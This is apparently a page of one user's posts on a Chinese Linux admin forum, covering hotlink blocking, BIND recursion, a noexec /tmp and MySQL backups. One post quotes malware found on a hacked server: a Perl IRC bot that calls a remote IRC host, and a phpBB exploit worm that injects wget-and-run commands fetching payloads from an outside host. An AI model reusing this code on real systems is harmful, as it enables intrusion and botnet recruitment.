http://www.securityfocus.com/infocus/1786

有興趣的可以把它印下來,放在手邊當參考。

另外,也強烈建議大家,如果要增強系統安全的認知以及英文能力的話,
可以訂閱那家公司的maillist,最近就是看了他們的文章,才知道原來
RealVNC 4.1.1有安全大漏洞。

46
那個~

error code從 200 變成 304
引用
10.3.5 304 Not Modified
If the client has performed a conditional GET request and access is allowed, but the document has not been modified, the server SHOULD respond with this status code. The 304 response MUST NOT contain a message-body, and thus is always terminated by the first empty line after the header fields.

The response MUST include the following header fields:

      - Date, unless its omission is required by section 14.18.1
If a clockless origin server obeys these rules, and proxies and clients add their own Date to any response received without one (as already specified by [RFC 2068], section 14.19), caches will operate correctly.

      - ETag and/or Content-Location, if the header would have been sent
        in a 200 response to the same request
      - Expires, Cache-Control, and/or Vary, if the field-value might
        differ from that sent in any previous response for the same
        variant
If the conditional GET used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. Otherwise (i.e., the conditional GET used a weak validator), the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers.

If a 304 response indicates an entity not currently cached, then the cache MUST disregard the response and repeat the request without the conditional.

If a cache uses a received 304 response to update a cache entry, the cache MUST update the entry to reflect any new field values given in the response


看來是有用了,不過看連線狀態,那些被我擋的網站好像在-狂連-狂連-狂連,
所以,我這麼做的結果是,減少了頻寬的佔用,還是增加了LOG,也增加了被[有心人士]連過來瞧瞧的機會呢?
 :o

47
雖然很遜,不過我還是把我的規則貼給大家參考:

代碼: [選擇]
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http://profile.myspace.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://profile.myspace.com/$ [NC]
#上面這兩的結果好像一樣?
RewriteCond %{HTTP_REFERER} ^http://spaces.msn.com/slaberic/blog/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://www.roicat.com.tw/newposter/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://sharingmania.blogspot.com//.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://images.google.co.id/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://images.google.co.uk/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://www.oxxk.com/vod/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://dir.yam.com/ent/movies/mov%5Fpos/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://lovels.idc99.cn/vod/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://dir.iask.com/search_dir/yl/ysh/hb/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://www.wretch.cc/blog/mikiyang/.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http://dir.pchome.com.tw/entertainment/movie/introduce/movie_placard/.*$ [NC]
RewriteRule .*\.(jpg|gif|png|bmp|rar|zip|exe)$ - [F]

48
最近發現我維護的一個網站一直有這樣的存取訊息,而且非常頻繁:

代碼: [選擇]
66.91.56.7 - - [17/May/2006:15:27:38 +0800] "GET /poster/i-l/longestyard.JPG HTTP/1.1" 200 40073 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=15047703" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
不同的來源IP,但後面REFER的網址都差不多,
請問這是在幹嘛呢?看起來不像是真的在瀏覽我的網頁耶~

如果要針對REFER的內容作限制的話,我應該要怎麼作呢? 謝謝!

Fedora Core 3
Apache 2.0.53

49
雜七雜八 / 我好笨~搞不懂時區耶~
« 於: 2006-05-15 16:20 »
WEBCAST 1
WhatWorks in Log Management: "Judging Log Management with San Bernardino
County Superior Court"
Tuesday, May 16 at 1:00 PM EDT (1700 UTC/GMT)
Featuring: Kevin Arden & Alan Paller
https://www.sans.org/webcasts/show.php?webcastid=90681
Sponsored by: Prism Microsystems

這樣是台灣的幾月幾號幾點呢?

50
Linux 討論版 / Bind recursive queries
« 於: 2006-05-14 11:01 »
謝謝兩位學長的解答,

剛剛仔細在看了一下BIND的管理手冊,
應該要加成這一段:

allow-recursion { our-nets; };


只是我搞不太清楚,不知道recursion是什麼意思,
照字面看來有循環、遞迴的意思,
似乎是在 master-slave 架構中才使用得到的參數?
並且可以方便駭客對你的DNS SERVER做DoS攻擊?

所以,因為不知道它確切的目的在哪裡,所以我還是把它給關掉了:

我在options 裡面加了這一段:

recursion no;

51
Linux 討論版 / Bind recursive queries
« 於: 2006-05-10 22:19 »
最近用NESSUS掃描,有一個問題一直搞不懂,我依照文件的建議
設定好acl了,但是卻搞得我的HTTP Virtual Server出問題,
不知道有沒有人針對這個弱點做過改善呢?

我的做法是,在named.conf最前面宣告:

acl my-nets {127.0.0.1/32; 59.xxx.xxx.0/24; };

然後在options裡面加一行:

allow-query { my-nets; };

這樣不妥嗎?

還是我在my-nets裡面的設定有問題呢?


引用
Synopsis :

The remote name server allows recursive queries to be performed
by the host running nessusd.


Description :

It is possible to query the remote name server for third party names.

If this is your internal nameserver, then forget this warning.

If you are probing a remote nameserver, then it allows anyone
to use it to resolve third parties names (such as www.nessus.org).
This allows hackers to do cache poisoning attacks against this
nameserver.

If the host allows these recursive queries via UDP,
then the host can be used to 'bounce' Denial of Service attacks
against another network or system.

See also :

http://www.cert.org/advisories/CA-1997-22.html

Solution :

Restrict recursive queries to the hosts that should
use this nameserver (such as those of the LAN connected to it).

If you are using bind 8, you can do this by using the instruction
'allow-recursion' in the 'options' section of your named.conf

If you are using bind 9, you can define a grouping of internal addresses
using the 'acl' command

Then, within the options block, you can explicitly state:
'allow-recursion { hosts_defined_in_acl }'

For more info on Bind 9 administration (to include recursion), see:
http://www.nominum.com/content/documents/bind9arm.pdf

If you are using another name server, consult its documentation.

Risk factor :

Medium / CVSS Base Score : 4
(AV:R/AC:L/Au:NR/C:N/A:N/I:P/B:I)
CVE : CVE-1999-0024
BID : 136, 678
Nessus ID : 10539

52
我也很想,只是機器在台中,我人卻在苗栗。

今天約好去裝Fedora Core 5了,謝謝你們的回應,謝謝!

53
Linux 討論版 / 網路安裝的問題
« 於: 2006-05-10 21:46 »
/                         可以留大一點,如果你後面幾個都不割的話
/boot                   這個倒是不必太大,約麼256也就夠囉
/var                    5Gb 如何?
/var/lib/mysql      這個就要看你有沒有用到?MySql囉
/usr                    3Gb 如何?
/usr/local            2Gb應該也夠了
/home                看的使用者多不多囉~
/tmp                  最近因為被入侵,緊賭懶,所以我想還是另外割出來,然後獨立MOUNT成NOEXEC

參考而已,還是得是實際狀況而定,如果能的話,一併將VLM設定好,倒也就不用考慮以後容量不夠的問題了。

54
我想把mysql 3.23 升上去 4.1以上的版本,
不過,工程看來似乎太過浩大,
光是openssl就困難重重了,

不知有哪位前輩有這麼做過,還是可以提供一下撇步呢?

還我乾脆全部抓source回來,全部弄到/usr/local底下好了??

謝先~

55
剛剛拜讀各位長老的文章,其中有提到關於tmpfs的方法,
而我採用的是影像檔的方法,提供大家參考。

決定這麼弄,實在是因為太多入侵者直接利用tmp這個地方做壞事,
改成不能執行或許成效有限,並且也不太方便,但是兩害取其輕是需要的。

在做之前,你要先知道這麼做的話可能會對於一些程式產生影響,
至於有什麼影響,我也不敢確定,所以如果你只想試試看的話,
儘量不要在生產用的機器上面試。

代碼: [選擇]

[root@localhost ~]# dd if=/dev/zero of=/tmp.img bs=1024k count=100
[root@localhost ~]# ls -alh

-rw-r--r--   1 root root 200M  5¤ë  8 19:22 tmp.img

[root@localhost ~]# mkfs -text3 tmp.img
[root@localhost ~]# mv /tmp /tmpp
[root@localhost ~]# mount -oloop,noexec tmp.img /tmp
[root@localhost ~]# df -h

/root/tmp.img         194M  5.6M  179M   4% /tmp

[root@localhost ~]# cat /etc/mtab
[root@localhost ~]# /root/tmp.img /tmp ext3 rw,noexec,loop=/dev/loop0 0 0

[root@localhost ~]# vi /etc/fstab

/root/tmp.img           /tmp                    ext3    loop,noexec     0 0


/home其實也可以如法砲製,不過,你大概不會希望一般使用者沒事就可以直接登入吧? :D

56
本來想換資安方面的工作,
不過,當然資格不夠,所以就跑來寫AS400的程式,

但是從以前與LINUX直接相關的工作環境到現在,
每次遇到被入侵,心裡面總是覺得很火。

與其說火,到也可以說崇拜,講真的,撇開拿人家現成工具去亂搞
別人機器的低級駭客不說,真正的駭客還是讓我覺得很神的。

真正的駭客應該有著雄厚的網路及程式設計基礎,加上對作業系統
的熟悉度,編寫適當的工具,先旁敲側擊,然後再大舉入侵。

上面那段是我亂想的,現在的工作讓我閒到發慌,所以只好胡思亂想,哈~

hoyo說得對,我還是儘量修補系統,把系統被入侵的漏洞撿到越少越好。

57
換了工作之後就很少摸Linux了,
今天心血來潮想寫個支備份程式,卻意外發現主機被駭掉了,
這支程式大概有700多行,前幾行是這樣的:

代碼: [選擇]

#!/usr/bin/perl
my $processo = '/usr/local/sbin/httpd -DSSL';
my $linas_max='5';
my $sleep='5';
my @adms=("spart","hacked");
my @hostauth=("spart.gov","muie.gov");
my @canais=("#hor");
my $pwned="/tmp/horderd";
my $nick='FLaviu-';
my $ircname = 'spart';
chop (my $realname = 'uname -a');
$servidor='aiurea.sytes.net' unless $servidor;
my $porta='6667';

my $VERSAO = '0.2';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


還有一支,只能看,不能用。

我覺得很奇怪,到底要怎麼樣才可以像
這些駭客一樣辦到呢?

用現成的工具?
利用漏洞,怎麼個利用法?
就算每天修修補捕的,駭客好像想進來你的系統就,隨時可以進來似的。


代碼: [選擇]

#!/usr/bin/perl

use strict;
use IO::Socket;
use IO::Handle;

if (-e "/tmp/.eu1deiogringos") {exit;}

my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $s= (int(rand(1000)));
    if ($rnd>1000) { $s= (int(rand(200)))}
 
   

    my @str=(
             "%22%3A%3A+View%22+%22+Topic%22+2.0.4+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.5+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.6+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.7+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.8+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.9+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.10+",



 );

    my $query="search.msn.com.br/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&first=$s";

    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/msn|cache|hotmail/){
            push (@lst,$1);
        }
    }
   
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };    
    return $page;

}

sub encode($) {
    my $s = shift;
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
    $s =~ s/%252E$//;
    return $s;
}



eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;

            $url =~ s/&highlight.*//;
            my $upload=$url;
            $upload =~ s/viewtopic.*//;
            $cmd="wget http://ddos.nikitosa.net.ru/myfiles/expl/linuxday.txt -O /tmp/.girl; wget http://ddos.nikitosa.net.ru/myfiles/expl/linuxdaybot.txt -O /tmp/.girl2; perl /tmp/.girl; perl /tmp/.girl2;";    # set cmd
            $cmd=encode("$cmd");    # set cmd
            $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
            $page = http_query($url);
$cmd="wget
http://ddos.nikitosa.net.ru/myfiles/expl/linuxdaybot.txt -O /tmp/.girl2; perl
/tmp/.girl2; touch /tmp/.eu1deiogringos;";
            $page = http_query($url);
        }

    }
}

58
看來也不需要勞師動眾的啟用DNS Server,既然Internet找得到你的主機PC1了,就用DMZ Mapping的方式,把相關服務對應到相關的主機就好啦~

如果要很多個hostname,可以上網找一些免費的DNS服務,如dyndns.org或花生殼之類的,其實也蠻方便的,配合代理程式,即使你用的是浮動IP,還是可以用起來像是固定IP一樣。

一個IP最多個對應,也就只能利用不同的Port來做DMZ的對應。

59
database 討論版 / MySQL清空資料的問題
« 於: 2005-12-26 12:51 »
先寫一個SQL的指令稿,把想執行的SQL語法寫下來,如:

select * from xxx.yyy into outfile /backup/xxx.yyy.sql
delete * from xxx.yyy
(outfile的寫法我不確定是不是這樣)

然後寫一個Shell Script來搭配,如:

#!/bin/bash
/usr/local/mysql xxx -uroot -p123456 < /somewhere/test.sql


也可以直接在Shell Script裡面用mysqldump方法把資料備出來。
mysqldump -A -uroot -p123456 > /backup/1226.sql

如何全部用一個Shell Script來搞定,就有勞高手幫忙拉~
我不知道哪個MYSQL的指令可以直接輸入SQL命令耶~

60
先用Fedora Core 4囉~

然後買鳥哥的書,用力給它K一K,應該也就夠囉~

不然的話,花個把月的時間把這網站讀 一遍,然後做一遍,
應該也稱得上高手了~

其實我覺得還是要實際練習最重要啦!以前不知從哪聽來的屁話,
跟我說他家有一百多本的LINUX相關書籍,結果連SAMBA的一些基礎
都答不上來。

所以,如果想變成高手,而又不想花太多買書的錢,只要勤實做,
勤上網查資料,我想~

應該離高手也不遠了。

頁: 1 [2] 3 4